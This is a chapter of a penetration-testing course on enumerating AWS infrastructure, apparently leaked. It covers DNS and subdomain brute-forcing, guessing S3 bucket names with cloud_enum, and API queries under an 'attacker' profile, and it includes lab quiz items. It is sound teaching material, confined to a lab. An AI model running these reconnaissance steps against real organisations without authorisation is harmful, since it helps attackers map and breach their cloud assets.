PEN-200
- Courses
- Penetration Testing with Kali Linux
PEN-200: 24. Enumerating AWS Cloud Infrastructure | Leaked by hide01.ir
24. Enumerating AWS Cloud Infrastructure
In this Learning Module, we will cover the following Learning Units:
- Reconnaissance of Cloud Resources on the Internet
- Reconnaissance via Cloud Service Provider's API
- Initial IAM Reconnaissance
- IAM Resources Enumeration
As part of the PEN-200 course, this module will focus on the critical techniques for conducting reconnaissance and enumeration specifically within Amazon Web Services (AWS), one of the most widely used cloud platforms.
Reconnaissance, also known as information gathering, is typically the first stage in penetration testing methodologies or a cyber-attack kill chain. This is an important phase because it helps discover all the information we can find about the target to expand its attack surface.
During the reconnaissance phase, we can describe enumeration as the process of identifying, categorizing, and listing components and resources within the target.
As we progress through the labs, we'll notice that this process has a recursive nature. While conducting the reconnaissance and enumeration phase, we might identify a vulnerability granting us further access to the environment. Once this happens, it becomes necessary to conduct the reconnaissance phase all over again for the newly-found assets with our greater understanding and permissions.
In this Module, we'll focus on reconnaissance and enumeration of targets hosted on public cloud service providers (CSPs). For our hands-on experience, we'll use Amazon Web Services (AWS) as our lab environment.
First, we'll take an external approach, meaning we'll analyze only what is publicly accessible. We'll learn how to identify whether a target has resources hosted on a cloud platform and move on to exploring techniques for enumerating cloud resources from the outside perspective.
Next, we'll shift to an internal perspective, acting as if we've already gained access to the target's environment. We'll explore how to list cloud resources from the inside using the Cloud Service Provider's API.
By understanding and simulating these techniques, we'll also gain valuable insights into how to safeguard cloud environments effectively.
24.1. About the Public Cloud Labs
Before we jump in, let's run through a standard disclaimer.
This module uses OffSec's Public Cloud Labs for challenges and walkthroughs. OffSec's Public Cloud Labs are a type of lab environment that will complement the learning experience with hands-on practice. In contrast to our more common VM labs found elsewhere in OffSec Learning Modules (in which learners will connect to the lab through a VPN, or via in-browser VMs), learners using the Public Cloud Labs will interact directly with the cloud environment through the Internet.
OffSec believes strongly in the advantages of learning and practicing in a hands-on environment, and we believe that the OffSec Public Cloud Labs represent an excellent opportunity for both new learners and practitioners who want to stay sharp.
Please note the following:
-
The lab environment should not be used for activities not described or requested in the learning materials you encounter. It is not designed to serve as a playground to test additional items that are out of the scope of the Learning Module.
-
The lab environment should not be used to take action against any asset external to the lab. This is specifically noteworthy because some Modules may describe or even demonstrate attacks against vulnerable cloud deployments for the purpose of describing how those deployments can be secured.
-
Existing rules and requirements against sharing OffSec training materials still apply. Credentials and other details of the lab are not meant to be shared. OffSec monitors activity in the Public Cloud Labs (including resource usage) and monitors for abnormal events that are not related to activities described in the learning modules.
Activities that are flagged as suspicious will result in an investigation. If the investigation determines that a student acted outside of the guidelines described above, or otherwise intentionally abused the OffSec Public Cloud Labs, OffSec may choose to rescind that learner's access to the OffSec Public Cloud Labs and/or terminate the learner's account.
Progress between sessions is not saved. Note that a Public Cloud Lab that is restarted will return to its original state. After an hour has elapsed, the Public Cloud Lab will prompt to determine if the session is still active. If there is no response, the lab session will end. Learners can continue to manually extend a session for up to ten hours. The learning material is designed to accommodate the limitations of the environment. No learner is expected or required to complete all of the activities in a Module within a single lab session. Even so, learners may choose to break up their learning into multiple sessions with the labs. We recommend making a note of the series of commands and actions that were completed previously to facilitate the restoration of the lab environment to the state it was in when the learner left. This is especially important when working through complex labs that require multiple actions.
24.2. Reconnaissance of Cloud Resources on the Internet
This Learning Unit covers the following Learning Objectives:
- Perform Domain and Subdomain Reconnaissance
- Identify Service-specific Domains
The first part of the NIST Definition of Cloud Computing Model states:
Cloud computing is a model for enabling ubiquitous, convenient, on-demand network access to a shared pool of configurable computing resources...
There is also an essential characteristic of this model that states:
Broad network access: Capabilities are available over the network and accessed through standard mechanisms that promote use by heterogeneous thin or thick client platforms (e.g., mobile phones, tablets, laptops, and workstations).
The terms "ubiquitous" and "convenient" in the description, coupled with the "Broad network access" characteristic, introduce an inherent aspect of public accessibility to cloud resources.
The cloud computing model has evolved since that initial definition. We can find cloud resources that are not meant to be publicly-accessible by default or at all, such as network interfaces, virtual disks, etc. These are internal components of bigger resources facing the internet but, nevertheless, we can consider them as cloud resources. Some of those components even have the ability to be shared between other users.
In this Module, the attacker's goal during discovery and reconnaissance is to find publicly-accessible resources as well as resources that weren't meant to be publicly-accessible (typically due to misconfigurations).
In this Learning Unit, we'll discuss techniques for discovering cloud resources accessible on the public network that don't require authenticated interaction with the CSP API.
24.2.1. Accessing the Lab
For the hands-on experience in this Module, we'll adopt the role of an attacker during the reconnaissance phase, focusing on a single organization as target. Without any information but the domain name, our initial steps will be to collect all the information we can get.
There are some preparatory steps needed to set up our lab environment found at the end of this section. Deployment will take a few minutes to complete and, once complete, the additional services might take 5-10 minutes to start.
Once the lab finishes its deployment, we'll receive some pieces of information we'll need later while working in the lab.
- Public DNS IP Address
- Domain name of the target
- Credentials for the IAM user attacker
- ACCESS_KEY_ID
- SECRET_ACCESS_KEY
First, we need to configure the DNS in our local environment to use the public DNS set for this lab.
Because this is a simulated exercise, we will not conduct any action on a real published domain. Instead, we'll be targeting a custom public DNS deployed within the lab. The techniques and tools we'll use apply to any public domain, however. After the lab starts, it will take roughly five minutes for the custom DNS server to start responding. We can confirm that all services have started when we can successfully query the DNS server.
Tip
We should also keep in mind that the public IP address of the DNS server will change every time we restart the lab, and we'll need to run this configuration again.
In our Kali machine, we can check our current DNS server by reading the /etc/resolv.conf file.
kali@kali:~$ cat /etc/resolv.conf
# Generated by NetworkManager
nameserver 1.1.1.1
Listing 1 - Getting DNS Servers in Our Kali Machine
We need to add a new nameserver line at the beginning of the file so that our DNS queries first go to our lab DNS server. We'll use nano to modify the file, as shown below:
kali@kali:~$ sudo nano /etc/resolv.conf
[sudo] password for kali:
kali@kali:~$ cat /etc/resolv.conf
# Generated by NetworkManager
nameserver 44.205.254.229
nameserver 1.1.1.1
Listing 2 - Modifying /etc/resolv.conf to Add a New Nameserver
We can test the configuration with command line tool such as host, which is used for performing DNS lookups and is commonly installed by default on Linux.
Let's assume www.offseclab.io exists in our target domain. We'll first run a DNS lookup specifying the DNS server's public IP address. This will validate that the DNS server is responding as expected.
Next, we'll run a DNS lookup again without specifying a DNS server. The tool will use the system's DNS configuration. This will help confirm that our system configuration is also working as expected.
Tip
Some ISPs restrict customers from querying external DNS servers. If this occurs, the two commands in the listing below will fail. While not common, this can happen. As a workaround, using a mobile device as a hotspot to connect our lab to the internet is an option. In the worst-case scenario, this issue would only affect our ability to work on the 'Domain Reconnaissance' section.
kali@kali:~$ host www.offseclab.io 44.205.254.229
www.offseclab.io has address 52.70.117.69
kali@kali:~$ host www.offseclab.io
www.offseclab.io has address 52.70.117.69
Listing 3 - Testing DNS Configurations in Kali Using host Tool
Finally, we should keep in mind that the configuration we set up in the DNS will not be permanent. The default network configuration in Kali uses Network Manager, and it will overwrite the content of the resolv.conf file every time we restart the network service or the whole operating system.
When we finish working in our lab, we need to reset our local Kali machine's DNS settings. To do this, we can again edit the /etc/resolv.conf file and remove the nameserver entry that we set while configuring the lab. Another easier way is to restart the NetworkManager service, which will return the file to the original state.
kali@kali:~$ sudo systemctl restart NetworkManager
[sudo] password for kali:
kali@kali:~$ cat /etc/resolv.conf
# Generated by NetworkManager
nameserver 1.1.1.1
Listing 4 - Resetting the DNS Settings
We can ensure everything is working as expected by navigating to any public site in the web browser.
For now, we'll start the lab to retrieve the DNS public IP address and configure the network in our local machine to use that secondary DNS server. We'll set aside the user's credentials for now and use them later in the module.
24.2.2. Domain and Subdomain Reconnaissance
Let's begin analyzing the target from the attacker's perspective. Currently, all we know about our target is its domain name: offseclab.io.
There are several things we can learn by analyzing the domain and the public IP address. In this section, we'll focus mainly on cloud-related information.
Let's begin by getting the authoritative DNS servers, i.e. the name servers that contain all records for this domain. We'll use the host command with the -t ns argument to query the nameserver records of the offseclab.io domain.
kali@kali:~$ host -t ns offseclab.io
offseclab.io name server ns-1536.awsdns-00.co.uk.
offseclab.io name server ns-512.awsdns-00.net.
offseclab.io name server ns-0.awsdns-00.com.
offseclab.io name server ns-1024.awsdns-00.org.
Listing 5 - Querying Nameserver Records of offseclab.io Domain
The names are very descriptive, and we can deduce the domain is managed by AWS. We can validate this by running the whois command to check the DNS registrar information of those domains. We'll pipe the output to the grep command to filter only the line that contains the organization name.
kali@kali:~$ whois awsdns-00.com | grep "Registrant Organization"
Registrant Organization: Amazon Technologies, Inc.
Listing 6 - Getting the Registrar Information of awsdns-00.com Domain
Now, we are sure that the offseclab.io domain is managed by AWS, very likely using the Route53 service. This doesn't mean the rest of the infrastructure is also hosted in AWS, so we need to keep digging.
Let's continue, using the host command again to get the public IP address of the website www.offseclab.io.
Tip
The public IP address in the listing below will be different every time we start the lab.
kali@kali:~$ host www.offseclab.io
www.offseclab.io has address 52.70.117.69
Listing 7 - Getting the Public IP address of www.offseclab.io
In the same way as before, we can learn some things by querying the DNS and doing a reverse DNS lookup. We'll use the host command again, but this time we'll query the public IP address. We'll also use whois to learn more details about the public IP address, paying special attention to the OrgName value.
kali@kali:~$ host 52.70.117.69
69.117.70.52.in-addr.arpa domain name pointer ec2-52-70-117-69.compute-1.amazonaws.com
kali@kali:~$ whois 52.70.117.69 | grep "OrgName"
OrgName: Amazon Technologies Inc.
Listing 8 - Getting Details of the Public IP Address of the Website
With the whois lookup, we realize that the public IP belongs to Amazon and with the reverse lookup, we learn two things: it's a resource hosted in AWS (amazonaws.com) and the resource is an Amazon Elastic Compute Cloud (Amazon EC2) instance.
Tip
The EC2 instance is a virtual machine in the AWS cloud. EC2 is a common service used to host websites, applications, and other services that require a server.
By doing some reconnaissance on the domain, we learned that the resource is hosted in a public CSP. This helps adapt our pentesting methodology and techniques to target the correct cloud environment.
While doing passive reconnaissance around the domain and public IP address, we should also include more OSINT research to collect more information about the target. The data we gather during this stage could be useful during later reconnaissance. Because the target in this lab is not a real organization, we won't find more data at this stage, so we'll skip this.
It's worth noticing that this phase should be executed recursively, meaning that we should do the same for other domains, subdomains and public IP addresses we find.
Finally, we will run an automated tool that will retrieve some information we already have, but will also perform a dictionary attack to discover more subdomains. There are many tools that do this. In this lab, we'll use the dnsenum tool that comes with Kali. The only required parameter is the domain name we are going to target, i.e. offseclab.io. We'll also add the --threads 500 argument to increase the threads that will execute the requests to the DNS, thus speeding up the attack in case of any throttling.
kali@kali:~$ dnsenum offseclab.io --threads 100
dnsenum VERSION:1.2.6
----- offseclab.io -----
Host's addresses:
__________________
offseclab.io. 60 IN A 52.70.117.69
Name Servers:
______________
ns-1536.awsdns-00.co.uk. 0 IN A 205.251.198.0
ns-0.awsdns-00.com. 0 IN A 205.251.192.0
ns-512.awsdns-00.net. 0 IN A 205.251.194.0
ns-1024.awsdns-00.org. 0 IN A 205.251.196.0
Mail (MX) Servers:
___________________
Trying Zone Transfers and getting Bind Versions:
_________________________________________________
Trying Zone Transfer for offseclab.io on ns-512.awsdns-00.net ...
AXFR record query failed: corrupt packet
Trying Zone Transfer for offseclab.io on ns-1024.awsdns-00.org ...
AXFR record query failed: corrupt packet
Trying Zone Transfer for offseclab.io on ns-0.awsdns-00.com ...
AXFR record query failed: corrupt packet
Trying Zone Transfer for offseclab.io on ns-1536.awsdns-00.co.uk ...
AXFR record query failed: corrupt packet
Brute forcing with /usr/share/dnsenum/dns.txt:
_______________________________________________
mail.offseclab.io. 60 IN A 52.70.117.69
www.offseclab.io. 60 IN A 52.70.117.69
...
Listing 9 - Using dnsenum to Automate DNS Reconnaissance of offseclab.io Domain
The output confirms the name servers and the public IP address we got before. We also discovered some subdomains. The other two sites are fictional for this lab and don't contain real vulnerabilities, so we don't need to analyze them further in this lab.
Let's wrap up this section by providing a glimpse of what we have learned about the target through reconnaissance:
- The domain service is hosted in AWS, so it's likely using AWS Route53 service.
- The domain name resolves to a public IP, which is also provided by AWS, specifically to the EC2 service.
- This public IP serves several websites including the main site www.offseclab.io, meaning they are running inside an EC2 instance.
In the next section, we'll analyze the main site while continuing to perform cloud-related reconnaissance.
Labs
- What command is used to query the authoritative DNS servers for the domain offseclab.io?
A) host -t ns offseclab.io
B) whois offseclab.io
C) dig offseclab.io
D) nslookup offseclab.io
- Which AWS service is very likely being used to manage the offseclab.io domain?
A) Amazon S3
B) Amazon EC2
C) Amazon Route 53
D) Amazon RDS
- Find the proof while gathering more info about the domain inside other commonly used DNS records.
24.2.3. Service-specific Domains
We already conducted some reconnaissance around the target's domain name. In this section, we'll search around service-specific domains to find cloud resources belonging to the target organization.
Public CSPs often use a specific domain name to address cloud resources. We already found an example of this in the previous section when we did a DNS reverse lookup to the public IP address and, through the response (ec2-52-70-117-69.compute-1.amazonaws.com), we discovered the domain amazonaws.com and that they are using the EC2 service. That is the custom naming that AWS uses to create the PTR records for their public IPs assigned to EC2 instances.
We can leverage these naming conventions in public cloud resources to enumerate cloud resources.
Let's continue with the lab to explore an example. We'll interact with the publicly-available resources we have found, starting with the website.
Tip
Before proceeding with the lab, we should ensure the lab is running and the public IP of the DNS is configured in our local OS.
We'll use a browser to start analyzing the site. Our main focus is to learn about the technologies behind it. After this, we can decide whether to use other tools for further analysis.
Let's open a web browser and navigate to http://www.offseclab.io.
By interacting with the site, we can learn that offseclab.io is an organization hosting vulnerable lab environments for learning purposes.
Warning
We should be aware that the site is fictional for this lab; it doesn't really implement or give access to the projects displayed.
By visiting the domain, we're provided with an HTML file. At this point, we're unsure which, or even if, server-side scripting languages are in use. To inspect this further, let's use the Developer Tools to determine what assets the site loads when we browse it.
We'll use Firefox, since it's in the default installation of Kali Linux, and open Developer Tools using the hotkey +. Other browsers also implement this hotkey for their own developer tools, although the UI appearance may be different.
Inside the Developer Tools window, we'll navigate to the Network tab. This will show us all the requests that are made when loading the website. Once in the Network tab, we can reload the current page.
We receive a table with several elements that the website loads. This includes stylesheet files (.css), script files (.js), images (.png, .jpg), etc. The File column identifies the filename of the element and the Domain column identifies to which domain the browser requests it.
If we scroll through the list, we'll find that the browser requests elements coming from some domains, which include offseclab.io, some fonts from external domains, and more interestingly, some images from s3.amazonaws.com.
We can click on one of these images to retrieve more details of the request, including the full resource path of the element.
We can copy the URL or double-click on the row to open the image in another browser tab, then analyze the URL.
By identifying the domain in the URL s3.amazonaws.com, we can infer that the images are stored in an AWS S3 bucket.
Tip
If we have local issues communicating with the public DNS server, we can get the bucket name from AWS CLI by running the 's3 ls' subcommand with the attacker profile.
From the path offseclab-assets-public-axevtewi/sites/www/images/amethyst.png, we can learn that the S3 bucket name is offseclab-assets-public-axevtewi and the object key is sites/www/images/ruby-expanded.png.
The URL format is documented in Methods for accessing a bucket.
Tip
The documentation includes the AWS Region in the URL. In this example, AWS internally redirects s3.amazonaws.com to s3.us-east-1.amazonaws.com. This behavior might not be the same for other services.
Before diving into enumeration, let's quickly check if we can list the content of the bucket. We can test this by browsing the URL of the bucket in the web browser.
We'll remove the object key from the URL like the following: http://domain/bucket_name, then browse to that URL. Ideally, we should receive an Access Denied error.
Instead of the Access Denied error, we received an XML response containing all the key objects in the bucket. This is not a good practice in the bucket configuration. Unfortunately for us, besides the images, there aren't other objects in the bucket that can help us exploit the target further.
Tip
Objects can be public inside a bucket without setting public access to the bucket itself.
Next, let's analyze the bucket name: offseclab-assets-public-axevtewi. We can assume there is a naming convention in use that consists of the org name followed by a description of the bucket and a random string. Bucket names must be unique across the region, so the random string might be used to ensure that the name won't be duplicated. It can also help to avoid discovery by enumeration.
Making some assumptions about the naming convention, let's try browsing for the buckets with the name offseclab-assets-dev. In the original URL, we'll replace the word "public" with "dev".
The XML response of offseclab-assets-dev clearly states that the bucket does not exist.
Let's try again, this time using the name offseclab-assets-private.
This time we receive a different message. This code means that the bucket exists, although access is denied because it doesn't have public read permission. This is a good configuration for the bucket.
Tip
The random string should have helped avoid discovery by enumeration, but because the same random string was used, the effect was nullified. The practice of adding random strings or hashes is normal, but in this case, it was poorly implemented.
This discovery required some creativity and assumptions, but shows an example of enumerating cloud resources. The process is also easy to automate by writing a script on our own or searching for an already-built tool like cloudbrute or cloud-enum.
Just like the S3 service, other cloud services that are designed to be publicly-accessible typically use a custom URL or standard convention for displaying resources. This is true for other public CSPs, too. The table below lists some examples.
AWS | Azure | GCP |
---|---|---|
s3.amazonaws.com | web.core.windows.net | appspot.com |
awsapps.com | file.core.windows.net | storage.googleapis.com |
blob.core.windows.net | ||
azurewebsites.net | ||
cloudapp.net |
Table 1 - Custom URLs of All The Three Major CSPs
We can leverage these domains to search for resources in multiple clouds based on a keyword related to our target. Multi-cloud deployment is out of the scope for this Module, but we'll use the tool cloud-enum to search for more buckets belonging to offseclab.io.
Tip
Even though this is a lab environment, we are interacting directly with the AWS API. We'll keep this environment controlled by running the enumeration with a small-sized dictionary.
Kali already includes cloud-enum in its official repository. Let's install it after updating the packages.
kali@kali:~$ sudo apt update
[sudo] password for kali:
...
kali@kali:~$ sudo apt install cloud-enum
[sudo] password for kali:
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
...
Unpacking cloud-enum (0.7-3) over (0.7-2) ...
Setting up cloud-enum (0.7-3) ...
Processing triggers for man-db (2.11.2-2) ...
Processing triggers for kali-menu (2023.1.7) ...
Listing 10 - Updating the Packages and Installing cloud-enum in Kali Linux
Warning
Be aware that the package name of the tool is cloud-enum but the actual tool name to run in the command line is cloud_enum.
Once the installation completes, we can confirm it's installed by running cloud_enum --help. This will output the basic command usage.
kali@kali:~$ cloud_enum --help
usage: cloud_enum [-h] (-k KEYWORD | -kf KEYFILE) [-m MUTATIONS] [-b BRUTE]
[-t THREADS] [-ns NAMESERVER] [-l LOGFILE] [-f FORMAT]
[--disable-aws] [--disable-azure] [--disable-gcp] [-qs]
Multi-cloud enumeration utility. All hail OSINT!
options:
-h, --help show this help message and exit
-k KEYWORD, --keyword KEYWORD
Keyword. Can use argument multiple times.
-kf KEYFILE, --keyfile KEYFILE
Input file with a single keyword per line.
-m MUTATIONS, --mutations MUTATIONS
Mutations. Default: /usr/lib/cloud-
enum/enum_tools/fuzz.txt
-b BRUTE, --brute BRUTE
List to brute-force Azure container names. Default:
/usr/lib/cloud-enum/enum_tools/fuzz.txt
-t THREADS, --threads THREADS
Threads for HTTP brute-force. Default = 5
-ns NAMESERVER, --nameserver NAMESERVER
DNS server to use in brute-force.
-l LOGFILE, --logfile LOGFILE
Appends found items to specified file.
-f FORMAT, --format FORMAT
Format for log file (text,json,csv) - default: text
--disable-aws Disable Amazon checks.
--disable-azure Disable Azure checks.
--disable-gcp Disable Google checks.
-qs, --quickscan Disable all mutations and second-level scans
Listing 11 - Getting the cloud_enum Tool Usage Options
The cloud-enum tool will search through several public CSPs for resources containing a keyword specified using the --keyword KEYWORD (-k KEYWORD) parameter. We can specify multiple keyword arguments, or we can specify a list with the --keyfile KEYFILE (-kf KEYFILE) parameter.
We can also use the --mutations (-m) option to specify a file to add extra words to the keyword. If we don't specify any file, the /usr/lib/cloud-enum/enum_tools/fuzz.txt file is used by default. We can disable this option using the --quickscan (-qs) parameter.
Let's first test this using the bucket name we already know. We'll run a quickscan with cloud_enum -k offseclab-assets-public-axevtewi -qs. We'll also only perform a check in AWS, disabling other CSPs with the --disable-azure and --disable-gcp parameters.
kali@kali:~$ cloud_enum -k offseclab-assets-public-axevtewi --quickscan --disable-azure --disable-gcp
...
Keywords: offseclab-assets-public-axevtewi
Mutations: NONE! (Using quickscan)
Brute-list: /usr/lib/cloud-enum/enum_tools/fuzz.txt
[+] Mutated results: 1 items
++++++++++++++++++++++++++
amazon checks
++++++++++++++++++++++++++
[+] Checking for S3 buckets
OPEN S3 BUCKET: http://offseclab-assets-public-axevtewi.s3.amazonaws.com/
FILES:
->http://offseclab-assets-public-axevtewi.s3.amazonaws.com/offseclab-assets-public-axevtewi
->http://offseclab-assets-public-axevtewi.s3.amazonaws.com/sites/www/images/amethyst-expanded.png
->http://offseclab-assets-public-axevtewi.s3.amazonaws.com/sites/www/images/amethyst.png
->http://offseclab-assets-public-axevtewi.s3.amazonaws.com/sites/www/images/logo.svg
->http://offseclab-assets-public-axevtewi.s3.amazonaws.com/sites/www/images/pic02.jpg
->http://offseclab-assets-public-axevtewi.s3.amazonaws.com/sites/www/images/pic05.jpg
->http://offseclab-assets-public-axevtewi.s3.amazonaws.com/sites/www/images/pic13.jpg
->http://offseclab-assets-public-axevtewi.s3.amazonaws.com/sites/www/images/ruby-expanded.png
->http://offseclab-assets-public-axevtewi.s3.amazonaws.com/sites/www/images/ruby.jpg
->http://offseclab-assets-public-axevtewi.s3.amazonaws.com/sites/www/images/saphire-expanded.png
->http://offseclab-assets-public-axevtewi.s3.amazonaws.com/sites/www/images/saphire.jpg
Elapsed time: 00:00:00
[+] Checking for AWS Apps
[*] Brute-forcing a list of 1 possible DNS names
Elapsed time: 00:00:00
[+] All done, happy hacking!
Listing 12 - Running Quick Scan Against offseclab-assets-public-axevtewi Bucket Using cloud_enum in AWS
We can confirm that the tool works as expected. It found the bucket and also listed the content. Next, we'll try to enumerate with more keywords. Because we are testing a specific naming pattern, we'll benefit from building a custom key file.
There are many ways we could accomplish this. We'll use Bash scripting to run a oneliner for loop that iterates over some keywords and echo the keyword, inserting a prefix (offseclab-assets) and a suffix (-axevtewi) around it. Finally, we'll use the tee command to output the result to the console as well as the /tmp/keyfile.txt file. As a result, we have the key file with the names of buckets to validate if they exist.
kali@kali:~$ for key in "public" "private" "dev" "prod" "development" "production"; do echo "offseclab-assets-$key-axevtewi"; done | tee /tmp/keyfile.txt
offseclab-assets-public-axevtewi
offseclab-assets-private-axevtewi
offseclab-assets-dev-axevtewi
offseclab-assets-prod-axevtewi
offseclab-assets-development-axevtewi
offseclab-assets-production-axevtewi
Listing 13 - Making a Dictionary of Keywords to Search S3 Buckets
Now, we can run cloud_enum again by specifying the key file we generated (/tmp/keyfile.txt) with the --keyfile (-kf) argument.
kali@kali:~$ cloud_enum -kf /tmp/keyfile.txt -qs --disable-azure --disable-gcp
...
Keywords: offseclab-assets-public-axevtewi, offseclab-assets-private-axevtewi, offseclab-assets-dev-axevtewi, offseclab-assets-prod-axevtewi, offseclab-assets-development-axevtewi, offseclab-assets-production-axevtewi
Mutations: NONE! (Using quickscan)
Brute-list: /usr/lib/cloud-enum/enum_tools/fuzz.txt
[+] Mutated results: 6 items
++++++++++++++++++++++++++
amazon checks
++++++++++++++++++++++++++
[+] Checking for S3 buckets
OPEN S3 BUCKET: http://offseclab-assets-public-axevtewi.s3.amazonaws.com/
FILES:
->http://offseclab-assets-public-axevtewi.s3.amazonaws.com/offseclab-assets-public-axevtewi
->http://offseclab-assets-public-axevtewi.s3.amazonaws.com/sites/www/images/amethyst-expanded.png
->http://offseclab-assets-public-axevtewi.s3.amazonaws.com/sites/www/images/amethyst.png
->http://offseclab-assets-public-axevtewi.s3.amazonaws.com/sites/www/images/logo.svg
->http://offseclab-assets-public-axevtewi.s3.amazonaws.com/sites/www/images/pic02.jpg
->http://offseclab-assets-public-axevtewi.s3.amazonaws.com/sites/www/images/pic05.jpg
->http://offseclab-assets-public-axevtewi.s3.amazonaws.com/sites/www/images/pic13.jpg
->http://offseclab-assets-public-axevtewi.s3.amazonaws.com/sites/www/images/ruby-expanded.png
->http://offseclab-assets-public-axevtewi.s3.amazonaws.com/sites/www/images/ruby.jpg
->http://offseclab-assets-public-axevtewi.s3.amazonaws.com/sites/www/images/saphire-expanded.png
->http://offseclab-assets-public-axevtewi.s3.amazonaws.com/sites/www/images/saphire.jpg
Protected S3 Bucket: http://offseclab-assets-private-axevtewi.s3.amazonaws.com/
Elapsed time: 00:00:06
[+] Checking for AWS Apps
[*] Brute-forcing a list of 6 possible DNS names
Elapsed time: 00:00:00
[+] All done, happy hacking!
Listing 14 - Running cloud_enum Against The Generated keyfile.txt File
From the output, we can confirm there is another bucket, but it's Protected, meaning that it's not publicly-readable.
We could also attempt to validate if there are other buckets using other information we found during the reconnaissance phase. For example, it could be buckets that include the name of the offseclab projects like offseclab-assets-ruby-axevtewi or offseclab-ruby-axevtewi. We'll leave this as an exercise to the learner.
Let's summarize what we learned in this section.
Some resources in the cloud are meant to be publicly-accessible, and to discover these resources is not precisely a problem for security. However, we may encounter some resources with misconfigurations that grant over-excessive permissions.
Hosting in the cloud is flexible, meaning that organizations can deploy resources in several clouds. Discovering that an organization is using one cloud provider doesn't mean they aren't using other CSP services.
Labs
- What does the XML response indicate when received after removing the object key from the S3 URL?
A) The bucket does not exist
B) The bucket is publicly accessible and lists its contents
C) The bucket is fully private
D) The bucket is hosted on Azure
- Which custom URL is used by AWS for storing objects in S3 buckets?
A) azurewebsites.net
B) s3.amazonaws.com
C) storage.googleapis.com
D) web.core.windows.net
- Use the concepts we've learned to find other S3 buckets. We may want to build a dictionary around gemstones' names as it is the theme that the target uses to name the projects. Assume that the format follows the pattern offseclab-[gemstone]-[lab_assigned_random_value]. The proof resides in an object named proof.txt.
24.3. Reconnaissance via Cloud Service Provider's API
This Learning Unit covers the following Learning Objectives:
- Obtain information from publicly shared resources
- Obtain account IDs from public S3 buckets
- Enumerate IAM users in other accounts
Typically, public CSPs will enable at least two ways for customers to interact with their cloud environment.
One way is via a web application that acts as a portal for cloud services provided by the CSP. Access is protected by credentials (username, password, MFA, etc).
Another way is through APIs that allow customers to interact programmatically, integrating with custom solutions and even other cloud platforms. The API is publicly available, but requires authentication to interact with it.
In this section, we'll learn about some techniques that an attacker can use to discover more information about the target by interacting with the provider's API. In this case, the attacker creates an account in the cloud provider to receive credentials for interacting with the API.
We'll also review some examples of API abuse to obtain internal information about the target, i.e. users and roles.
24.3.1. Preparing the Lab - Configure AWS CLI
In the following sections of this Learning Unit, we'll interact with the AWS API from the command line using AWS CLI configured with the credentials that will be provided when we start the lab. Although the access keys of this lab belong to an user inside the target account, we'll simulate that they belong to an attacker from an external AWS account.
In AWS, the service that manages users and their permissions within the AWS cloud environment is called Identity and Access Management. We'll refer to this service as IAM and the users as IAM users.
If AWS CLI is not already installed, we can easily do it in Kali using the package manager.
kali@kali:~$ sudo apt update
...
kali@kali:~$ sudo apt install -y awscli
...
The following NEW packages will be installed:
awscli docutils-common python3-awscrt python3-docutils python3-jmespath python3-roman
(Reading database ... 461429 files and directories currently installed.)
...
Listing 15 - Installing AWS CLI in Kali Linux
To configure the credentials in AWS CLI, we'll use a named profile. This is a good practice, since during the lab we might need to interact with AWS as other IAM users; using profiles will make it easier to differentiate one IAM user from another and rapidly switch between them.
We'll run the aws --profile attacker configure command in the terminal. This will create a profile named attacker. When prompted, we'll set the values of attacker_access_key_id and attacker_access_key_secret provided when starting the lab.
To use the profile, we'll need to add the --profile attacker argument to every AWS command we run. Let's test this by running the aws --profile attacker sts get-caller-identity command. A JSON response with the user information is proof that the credentials were valid and we are interacting with the AWS API as the attacker IAM user.
kali@kali:~$ aws configure --profile attacker
AWS Access Key ID []: AKIAQO...
AWS Secret Access Key []: cOGzm...
Default region name []: us-east-1
Default output format []: json
kali@kali:~$ aws --profile attacker sts get-caller-identity
{
"UserId": "AIDAQOMAIGYU5VFQCHOI4",
"Account": "123456789012",
"Arn": "arn:aws:iam::123456789012:user/attacker"
}
Listing 16 - Configuring Profile and Validating Communication with AWS API
Once AWS CLI is properly configured with the attacker profile, we can proceed with the following sections of the lab.
24.3.2. Publicly Shared Resources
Some cloud assets, given the nature of their function, are inherently designed to be published on the internet, such as standard operating system images (Ubuntu, Debian, etc.) that organizations use as a building block for their EC2 instances. CSPs normally provide user-friendly ways to access these.
Alternatively, some cloud resources are designed for internal use, for example, custom-built machine images or snapshots of virtual drives and databases. Despite this, large organizations might have multiple public cloud accounts and need to share these resources between accounts or even publicly.
Warning
Ideally, these publicly-shared resources won't contain sensitive data and customers should do their part of the shared responsibility model and protect their assets. However, this is not always the case.
In this section, we are going to search and discover publicly-shared resources from offseclab.io. We'll focus on the following commonly used resources:
- Publicly-shared Amazon Machine Images (AMIs)
- Publicly-shared Elastic Block Storage (EBS) snapshots
- Relational Databases (RDS) snapshots
These shared resources commonly don't have a domain name or URL address to access them, so we'll need to use the CSP's API to request them.
Let's open the CLI, where we have the AWS CLI tool configured with the attacker's credentials. We'll search "Publicly Shared AMIs" as an example.
AMIs are virtual machine images containing a pre-installed operating system along with software and files. To deploy an EC2 instance in AWS, we must specify an AMI. We normally choose one from the public AMI Catalog, which contains images publicly shared by AWS, third-party partners, community, and other accounts. Let's use AWS CLI to list all these AMIs.
Warning
Unless otherwise specified, we'll be using the attacker profile, so we'll include in every command the --profile attacker argument.
The command ec2 describe-images will list all the images that the account can read. This will provide an extensive list of images as output. Let's include the --owners amazon argument to filter this list and show only AMIs provided by AWS.
Optionally, we can add the --executable-users all argument to ensure that all public AMIs will be listed, including any self-owned public AMIs.
Warning
Even filtering the results, the command below will take 30-60 seconds to complete.
kali@kali:~$ aws --profile attacker ec2 describe-images --owners amazon --executable-users all
{
"Images": [
{
"Architecture": "x86_64",
"CreationDate": "2022-06-29T09:46:55.000Z",
"ImageId": "ami-0d4f490f4e62171b4",
"ImageLocation": "amazon/Deep Learning Base AMI (Amazon Linux 2) Version 53.4",
"ImageType": "machine",
"Public": true,
"OwnerId": "898082745236",
"PlatformDetails": "Linux/UNIX",
"UsageOperation": "RunInstances",
"State": "available",
"BlockDeviceMappings": [
{
"DeviceName": "/dev/xvda",
"Ebs": {
"DeleteOnTermination": true,
"Iops": 3000,
"SnapshotId": "snap-0ce7f231ea72dd0ea",
"VolumeSize": 100,
...
Listing 17 - Listing All Public AMIs Owned by Amazon AWS
The output shows a list of public AMIs owned by Amazon. We can see several attributes of the AMIs, such as the ImageId, ImageLocation, CreationDate, PlatformDetails, and more.
To list all the AMIs owned by another account, we can change the value of the --owners argument to the target's Account ID. The account ID is a unique identifier for the AWS account that we get when we sign up in AWS.
We don't know the account ID of our target. However, we can leverage the filtering feature of the API to find resources by specifying other attributes.
The structure of a filter expression is as follows:
